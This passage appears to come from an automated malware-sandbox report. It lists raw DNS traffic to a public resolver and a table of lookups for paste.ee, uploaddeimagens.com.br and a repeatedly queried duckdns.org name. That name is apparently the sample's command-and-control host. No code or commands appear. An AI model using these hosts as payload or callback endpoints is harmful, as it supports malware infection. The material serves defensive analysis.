Apr 24, 2024 10:27:03.586468935 CEST	64956	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:27:03.757922888 CEST	53	64956	8.8.8.8	192.168.2.22
Apr 24, 2024 10:27:03.758188009 CEST	64956	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:27:03.935844898 CEST	53	64956	8.8.8.8	192.168.2.22
Apr 24, 2024 10:27:03.943926096 CEST	64956	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:27:04.113516092 CEST	53	64956	8.8.8.8	192.168.2.22
Apr 24, 2024 10:27:04.113923073 CEST	64956	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:27:04.283433914 CEST	53	64956	8.8.8.8	192.168.2.22
Apr 24, 2024 10:27:05.298074961 CEST	54521	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:27:05.468291998 CEST	53	54521	8.8.8.8	192.168.2.22
Apr 24, 2024 10:27:05.468683958 CEST	54521	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:27:05.641464949 CEST	53	54521	8.8.8.8	192.168.2.22
Apr 24, 2024 10:27:05.641782045 CEST	54521	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:27:05.812572956 CEST	53	54521	8.8.8.8	192.168.2.22
Apr 24, 2024 10:27:05.812838078 CEST	54521	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:27:05.983328104 CEST	53	54521	8.8.8.8	192.168.2.22
Apr 24, 2024 10:27:05.984123945 CEST	54521	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:27:06.154604912 CEST	53	54521	8.8.8.8	192.168.2.22
Apr 24, 2024 10:27:07.171912909 CEST	49750	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:27:07.345011950 CEST	53	49750	8.8.8.8	192.168.2.22
Apr 24, 2024 10:27:07.345752001 CEST	49750	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:27:07.516772032 CEST	53	49750	8.8.8.8	192.168.2.22
Apr 24, 2024 10:27:07.517827988 CEST	49750	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:27:07.762378931 CEST	53	49750	8.8.8.8	192.168.2.22
Apr 24, 2024 10:27:07.763237953 CEST	49750	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:27:08.007380009 CEST	53	49750	8.8.8.8	192.168.2.22
Apr 24, 2024 10:27:08.007713079 CEST	49750	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:27:08.177258968 CEST	53	49750	8.8.8.8	192.168.2.22
Apr 24, 2024 10:27:09.207320929 CEST	64687	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:27:09.452922106 CEST	53	64687	8.8.8.8	192.168.2.22
Apr 24, 2024 10:27:09.456091881 CEST	64687	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:27:09.626900911 CEST	53	64687	8.8.8.8	192.168.2.22
Apr 24, 2024 10:27:09.628160000 CEST	64687	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:27:09.802139997 CEST	53	64687	8.8.8.8	192.168.2.22
Apr 24, 2024 10:27:09.805771112 CEST	64687	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:27:09.976722956 CEST	53	64687	8.8.8.8	192.168.2.22
Apr 24, 2024 10:27:09.977200985 CEST	64687	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:27:10.146508932 CEST	53	64687	8.8.8.8	192.168.2.22
Apr 24, 2024 10:27:11.171346903 CEST	65084	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:27:11.342448950 CEST	53	65084	8.8.8.8	192.168.2.22
Apr 24, 2024 10:27:11.344038963 CEST	65084	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:27:11.515613079 CEST	53	65084	8.8.8.8	192.168.2.22
Apr 24, 2024 10:27:11.515832901 CEST	65084	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:27:11.685458899 CEST	53	65084	8.8.8.8	192.168.2.22
Apr 24, 2024 10:27:11.685666084 CEST	65084	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:27:11.855062008 CEST	53	65084	8.8.8.8	192.168.2.22
Apr 24, 2024 10:27:11.855257034 CEST	65084	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:27:12.028465033 CEST	53	65084	8.8.8.8	192.168.2.22
Apr 24, 2024 10:27:13.056180000 CEST	63373	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:27:13.229383945 CEST	53	63373	8.8.8.8	192.168.2.22
Apr 24, 2024 10:27:13.229625940 CEST	63373	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:27:13.400145054 CEST	53	63373	8.8.8.8	192.168.2.22
Apr 24, 2024 10:27:13.400440931 CEST	63373	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:27:13.572073936 CEST	53	63373	8.8.8.8	192.168.2.22
Apr 24, 2024 10:27:13.617816925 CEST	63373	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:27:13.788269997 CEST	53	63373	8.8.8.8	192.168.2.22
Apr 24, 2024 10:27:13.788574934 CEST	63373	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:27:13.963264942 CEST	53	63373	8.8.8.8	192.168.2.22
Apr 24, 2024 10:27:15.355403900 CEST	58971	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:27:15.525122881 CEST	53	58971	8.8.8.8	192.168.2.22
Apr 24, 2024 10:27:15.525897980 CEST	58971	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:27:15.695588112 CEST	53	58971	8.8.8.8	192.168.2.22
Apr 24, 2024 10:27:15.695857048 CEST	58971	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:27:15.865015984 CEST	53	58971	8.8.8.8	192.168.2.22
Apr 24, 2024 10:27:15.865652084 CEST	58971	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:27:16.037259102 CEST	53	58971	8.8.8.8	192.168.2.22
Apr 24, 2024 10:27:16.037744999 CEST	58971	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:27:16.207144022 CEST	53	58971	8.8.8.8	192.168.2.22
Apr 24, 2024 10:27:17.226687908 CEST	51014	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:27:17.400290012 CEST	53	51014	8.8.8.8	192.168.2.22
Apr 24, 2024 10:27:17.400820971 CEST	51014	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:27:17.573731899 CEST	53	51014	8.8.8.8	192.168.2.22
Apr 24, 2024 10:27:17.574054003 CEST	51014	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:27:17.746471882 CEST	53	51014	8.8.8.8	192.168.2.22
Apr 24, 2024 10:27:17.746754885 CEST	51014	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:27:17.918247938 CEST	53	51014	8.8.8.8	192.168.2.22
Apr 24, 2024 10:27:17.918768883 CEST	51014	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:27:18.088766098 CEST	53	51014	8.8.8.8	192.168.2.22
Apr 24, 2024 10:27:19.112514019 CEST	49690	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:27:19.284348011 CEST	53	49690	8.8.8.8	192.168.2.22
Apr 24, 2024 10:27:19.284691095 CEST	49690	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:27:19.455553055 CEST	53	49690	8.8.8.8	192.168.2.22
Apr 24, 2024 10:27:19.455954075 CEST	49690	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:27:19.627558947 CEST	53	49690	8.8.8.8	192.168.2.22
Apr 24, 2024 10:27:19.630024910 CEST	49690	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:27:19.799245119 CEST	53	49690	8.8.8.8	192.168.2.22
Apr 24, 2024 10:27:19.802915096 CEST	49690	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:27:20.047388077 CEST	53	49690	8.8.8.8	192.168.2.22
Apr 24, 2024 10:27:21.061506987 CEST	60169	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:27:21.234010935 CEST	53	60169	8.8.8.8	192.168.2.22
Apr 24, 2024 10:27:21.240917921 CEST	60169	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:27:21.410641909 CEST	53	60169	8.8.8.8	192.168.2.22
Apr 24, 2024 10:27:21.414764881 CEST	60169	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:27:21.586097956 CEST	53	60169	8.8.8.8	192.168.2.22
Apr 24, 2024 10:27:21.590035915 CEST	60169	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:27:21.764074087 CEST	53	60169	8.8.8.8	192.168.2.22
Apr 24, 2024 10:27:21.766416073 CEST	60169	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:27:21.938951969 CEST	53	60169	8.8.8.8	192.168.2.22
Apr 24, 2024 10:27:22.958211899 CEST	53060	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:27:23.128317118 CEST	53	53060	8.8.8.8	192.168.2.22
Apr 24, 2024 10:27:23.131113052 CEST	53060	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:27:23.301006079 CEST	53	53060	8.8.8.8	192.168.2.22
Apr 24, 2024 10:27:23.304126978 CEST	53060	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:27:23.474225044 CEST	53	53060	8.8.8.8	192.168.2.22
Apr 24, 2024 10:27:23.478357077 CEST	53060	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:27:23.649605036 CEST	53	53060	8.8.8.8	192.168.2.22
Apr 24, 2024 10:27:23.650393963 CEST	53060	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:27:23.819699049 CEST	53	53060	8.8.8.8	192.168.2.22
Apr 24, 2024 10:27:24.838408947 CEST	63950	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:27:25.011573076 CEST	53	63950	8.8.8.8	192.168.2.22
Apr 24, 2024 10:27:25.012598991 CEST	63950	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:27:25.184079885 CEST	53	63950	8.8.8.8	192.168.2.22
Apr 24, 2024 10:27:25.185429096 CEST	63950	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:27:25.361017942 CEST	53	63950	8.8.8.8	192.168.2.22
Apr 24, 2024 10:27:25.362092972 CEST	63950	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:27:25.533689022 CEST	53	63950	8.8.8.8	192.168.2.22
Apr 24, 2024 10:27:25.534986973 CEST	63950	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:27:25.706526995 CEST	53	63950	8.8.8.8	192.168.2.22
Apr 24, 2024 10:27:26.745852947 CEST	58257	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:27:26.916534901 CEST	53	58257	8.8.8.8	192.168.2.22
Apr 24, 2024 10:27:26.917037010 CEST	58257	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:27:27.087018967 CEST	53	58257	8.8.8.8	192.168.2.22
Apr 24, 2024 10:27:27.088144064 CEST	58257	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:27:27.257760048 CEST	53	58257	8.8.8.8	192.168.2.22
Apr 24, 2024 10:27:27.258173943 CEST	58257	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:27:27.432301044 CEST	53	58257	8.8.8.8	192.168.2.22
Apr 24, 2024 10:27:27.432531118 CEST	58257	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:27:27.604813099 CEST	53	58257	8.8.8.8	192.168.2.22
Apr 24, 2024 10:27:28.620630980 CEST	54738	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:27:28.792529106 CEST	53	54738	8.8.8.8	192.168.2.22
Apr 24, 2024 10:27:28.792924881 CEST	54738	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:27:28.962521076 CEST	53	54738	8.8.8.8	192.168.2.22
Apr 24, 2024 10:27:28.963236094 CEST	54738	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:27:29.132242918 CEST	53	54738	8.8.8.8	192.168.2.22
Apr 24, 2024 10:27:29.132572889 CEST	54738	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:27:29.301928997 CEST	53	54738	8.8.8.8	192.168.2.22
Apr 24, 2024 10:27:29.302155018 CEST	54738	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:27:29.471369982 CEST	53	54738	8.8.8.8	192.168.2.22
Apr 24, 2024 10:27:30.610621929 CEST	49478	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:27:30.781611919 CEST	53	49478	8.8.8.8	192.168.2.22
Apr 24, 2024 10:27:30.784126043 CEST	49478	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:27:30.956063986 CEST	53	49478	8.8.8.8	192.168.2.22
Apr 24, 2024 10:27:30.964158058 CEST	49478	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:27:31.133898020 CEST	53	49478	8.8.8.8	192.168.2.22
Apr 24, 2024 10:27:31.134289980 CEST	49478	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:27:31.304769039 CEST	53	49478	8.8.8.8	192.168.2.22
Apr 24, 2024 10:27:31.305036068 CEST	49478	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:27:31.474975109 CEST	53	49478	8.8.8.8	192.168.2.22
Apr 24, 2024 10:27:32.490535975 CEST	49288	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:27:32.663552046 CEST	53	49288	8.8.8.8	192.168.2.22
Apr 24, 2024 10:27:32.663824081 CEST	49288	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:27:32.834345102 CEST	53	49288	8.8.8.8	192.168.2.22
Apr 24, 2024 10:27:32.834944963 CEST	49288	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:27:33.005570889 CEST	53	49288	8.8.8.8	192.168.2.22
Apr 24, 2024 10:27:33.005809069 CEST	49288	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:27:33.176611900 CEST	53	49288	8.8.8.8	192.168.2.22
Apr 24, 2024 10:27:33.180335999 CEST	49288	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:27:33.356985092 CEST	53	49288	8.8.8.8	192.168.2.22
Apr 24, 2024 10:27:34.377790928 CEST	49226	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:27:34.550755024 CEST	53	49226	8.8.8.8	192.168.2.22
Apr 24, 2024 10:27:34.554173946 CEST	49226	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:27:34.727529049 CEST	53	49226	8.8.8.8	192.168.2.22
Apr 24, 2024 10:27:34.727826118 CEST	49226	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:27:34.898195028 CEST	53	49226	8.8.8.8	192.168.2.22
Apr 24, 2024 10:27:34.898413897 CEST	49226	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:27:35.069375992 CEST	53	49226	8.8.8.8	192.168.2.22
Apr 24, 2024 10:27:35.069567919 CEST	49226	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:27:35.239026070 CEST	53	49226	8.8.8.8	192.168.2.22
Apr 24, 2024 10:27:36.250526905 CEST	54695	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:27:36.420582056 CEST	53	54695	8.8.8.8	192.168.2.22
Apr 24, 2024 10:27:36.420775890 CEST	54695	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:27:36.591581106 CEST	53	54695	8.8.8.8	192.168.2.22
Apr 24, 2024 10:27:36.591785908 CEST	54695	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:27:36.764870882 CEST	53	54695	8.8.8.8	192.168.2.22
Apr 24, 2024 10:27:36.765079021 CEST	54695	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:27:36.934467077 CEST	53	54695	8.8.8.8	192.168.2.22
Apr 24, 2024 10:27:36.935988903 CEST	54695	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:27:37.105537891 CEST	53	54695	8.8.8.8	192.168.2.22
Apr 24, 2024 10:27:38.121633053 CEST	61601	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:27:38.293152094 CEST	53	61601	8.8.8.8	192.168.2.22
Apr 24, 2024 10:27:38.296170950 CEST	61601	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:27:38.466911077 CEST	53	61601	8.8.8.8	192.168.2.22
Apr 24, 2024 10:27:38.467911959 CEST	61601	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:27:38.638199091 CEST	53	61601	8.8.8.8	192.168.2.22
Apr 24, 2024 10:27:38.638386965 CEST	61601	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:27:38.883676052 CEST	53	61601	8.8.8.8	192.168.2.22
Apr 24, 2024 10:27:38.886128902 CEST	61601	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:27:39.057071924 CEST	53	61601	8.8.8.8	192.168.2.22
Apr 24, 2024 10:27:40.073828936 CEST	54615	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:27:40.245357037 CEST	53	54615	8.8.8.8	192.168.2.22
Apr 24, 2024 10:27:40.245629072 CEST	54615	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:27:40.416199923 CEST	53	54615	8.8.8.8	192.168.2.22
Apr 24, 2024 10:27:40.416615963 CEST	54615	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:27:40.586611032 CEST	53	54615	8.8.8.8	192.168.2.22
Apr 24, 2024 10:27:40.586970091 CEST	54615	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:27:40.759510994 CEST	53	54615	8.8.8.8	192.168.2.22
Apr 24, 2024 10:27:40.759728909 CEST	54615	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:27:40.933456898 CEST	53	54615	8.8.8.8	192.168.2.22
Apr 24, 2024 10:27:41.944057941 CEST	54950	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:27:42.114939928 CEST	53	54950	8.8.8.8	192.168.2.22
Apr 24, 2024 10:27:42.116087914 CEST	54950	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:27:42.285965919 CEST	53	54950	8.8.8.8	192.168.2.22
Apr 24, 2024 10:27:42.286587954 CEST	54950	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:27:42.457060099 CEST	53	54950	8.8.8.8	192.168.2.22
Apr 24, 2024 10:27:42.458251953 CEST	54950	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:27:42.628174067 CEST	53	54950	8.8.8.8	192.168.2.22
Apr 24, 2024 10:27:42.630963087 CEST	54950	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:27:42.801165104 CEST	53	54950	8.8.8.8	192.168.2.22
Apr 24, 2024 10:27:43.819580078 CEST	64215	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:27:43.992088079 CEST	53	64215	8.8.8.8	192.168.2.22
Apr 24, 2024 10:27:43.994704962 CEST	64215	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:27:44.167944908 CEST	53	64215	8.8.8.8	192.168.2.22
Apr 24, 2024 10:27:44.168373108 CEST	64215	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:27:44.339909077 CEST	53	64215	8.8.8.8	192.168.2.22
Apr 24, 2024 10:27:44.340207100 CEST	64215	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:27:44.514199018 CEST	53	64215	8.8.8.8	192.168.2.22
Apr 24, 2024 10:27:44.514466047 CEST	64215	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:27:44.690046072 CEST	53	64215	8.8.8.8	192.168.2.22
Apr 24, 2024 10:27:45.729456902 CEST	53031	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:27:45.899342060 CEST	53	53031	8.8.8.8	192.168.2.22
Apr 24, 2024 10:27:45.901599884 CEST	53031	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:27:46.074635029 CEST	53	53031	8.8.8.8	192.168.2.22
Apr 24, 2024 10:27:46.074964046 CEST	53031	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:27:46.245273113 CEST	53	53031	8.8.8.8	192.168.2.22
Apr 24, 2024 10:27:46.266437054 CEST	53031	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:27:46.437905073 CEST	53	53031	8.8.8.8	192.168.2.22
Apr 24, 2024 10:27:46.438179016 CEST	53031	53	192.168.2.22	8.8.8.8
Apr 24, 2024 10:27:46.614128113 CEST	53	53031	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Apr 24, 2024 10:24:05.418694973 CEST	192.168.2.22	8.8.8.8	0x27d5	Standard query (0)	paste.ee	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:24:05.619237900 CEST	192.168.2.22	8.8.8.8	0x27d5	Standard query (0)	paste.ee	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:24:05.792258024 CEST	192.168.2.22	8.8.8.8	0x27d5	Standard query (0)	paste.ee	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:24:05.966687918 CEST	192.168.2.22	8.8.8.8	0x27d5	Standard query (0)	paste.ee	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:24:09.849584103 CEST	192.168.2.22	8.8.8.8	0xb3a9	Standard query (0)	uploaddeimagens.com.br	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:24:20.715693951 CEST	192.168.2.22	8.8.8.8	0xd646	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:24:43.074939013 CEST	192.168.2.22	8.8.8.8	0x4e41	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:25:05.474859953 CEST	192.168.2.22	8.8.8.8	0x803b	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:25:29.803417921 CEST	192.168.2.22	8.8.8.8	0x730	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:25:56.015070915 CEST	192.168.2.22	8.8.8.8	0x9e7c	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:25:56.186801910 CEST	192.168.2.22	8.8.8.8	0x9e7c	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:25:56.435131073 CEST	192.168.2.22	8.8.8.8	0x9e7c	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:25:56.608850002 CEST	192.168.2.22	8.8.8.8	0x9e7c	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:25:56.787647963 CEST	192.168.2.22	8.8.8.8	0x9e7c	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:25:57.984812975 CEST	192.168.2.22	8.8.8.8	0xbbf7	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:25:58.228638887 CEST	192.168.2.22	8.8.8.8	0xbbf7	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:25:58.398096085 CEST	192.168.2.22	8.8.8.8	0xbbf7	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:25:58.642163038 CEST	192.168.2.22	8.8.8.8	0xbbf7	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:25:58.815480947 CEST	192.168.2.22	8.8.8.8	0xbbf7	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:25:59.998281956 CEST	192.168.2.22	8.8.8.8	0x1275	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:00.169178963 CEST	192.168.2.22	8.8.8.8	0x1275	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:00.340241909 CEST	192.168.2.22	8.8.8.8	0x1275	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:00.513514996 CEST	192.168.2.22	8.8.8.8	0x1275	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:00.683408022 CEST	192.168.2.22	8.8.8.8	0x1275	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:02.015851974 CEST	192.168.2.22	8.8.8.8	0x35c1	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:02.187361956 CEST	192.168.2.22	8.8.8.8	0x35c1	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:02.358251095 CEST	192.168.2.22	8.8.8.8	0x35c1	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:02.529007912 CEST	192.168.2.22	8.8.8.8	0x35c1	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:02.702657938 CEST	192.168.2.22	8.8.8.8	0x35c1	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:03.882461071 CEST	192.168.2.22	8.8.8.8	0x25be	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:04.053642988 CEST	192.168.2.22	8.8.8.8	0x25be	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:04.223642111 CEST	192.168.2.22	8.8.8.8	0x25be	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:04.397315979 CEST	192.168.2.22	8.8.8.8	0x25be	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:04.570049047 CEST	192.168.2.22	8.8.8.8	0x25be	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:05.754127026 CEST	192.168.2.22	8.8.8.8	0xb5f4	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:05.925287962 CEST	192.168.2.22	8.8.8.8	0xb5f4	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:06.096163034 CEST	192.168.2.22	8.8.8.8	0xb5f4	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:06.268366098 CEST	192.168.2.22	8.8.8.8	0xb5f4	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:06.440059900 CEST	192.168.2.22	8.8.8.8	0xb5f4	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:07.635370970 CEST	192.168.2.22	8.8.8.8	0xd538	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:07.884155989 CEST	192.168.2.22	8.8.8.8	0xd538	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:08.056999922 CEST	192.168.2.22	8.8.8.8	0xd538	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:08.227368116 CEST	192.168.2.22	8.8.8.8	0xd538	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:08.397118092 CEST	192.168.2.22	8.8.8.8	0xd538	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:09.588845015 CEST	192.168.2.22	8.8.8.8	0xad5a	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:09.760467052 CEST	192.168.2.22	8.8.8.8	0xad5a	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:09.934259892 CEST	192.168.2.22	8.8.8.8	0xad5a	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:10.112695932 CEST	192.168.2.22	8.8.8.8	0xad5a	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:10.287306070 CEST	192.168.2.22	8.8.8.8	0xad5a	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:11.515882969 CEST	192.168.2.22	8.8.8.8	0x476f	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:11.686635971 CEST	192.168.2.22	8.8.8.8	0x476f	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:11.860064030 CEST	192.168.2.22	8.8.8.8	0x476f	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:12.034003973 CEST	192.168.2.22	8.8.8.8	0x476f	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:12.204121113 CEST	192.168.2.22	8.8.8.8	0x476f	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:13.393147945 CEST	192.168.2.22	8.8.8.8	0x6047	Standard query (0)	remcjulia.duckdns.org	A (IP address)	IN (0x0001)	false
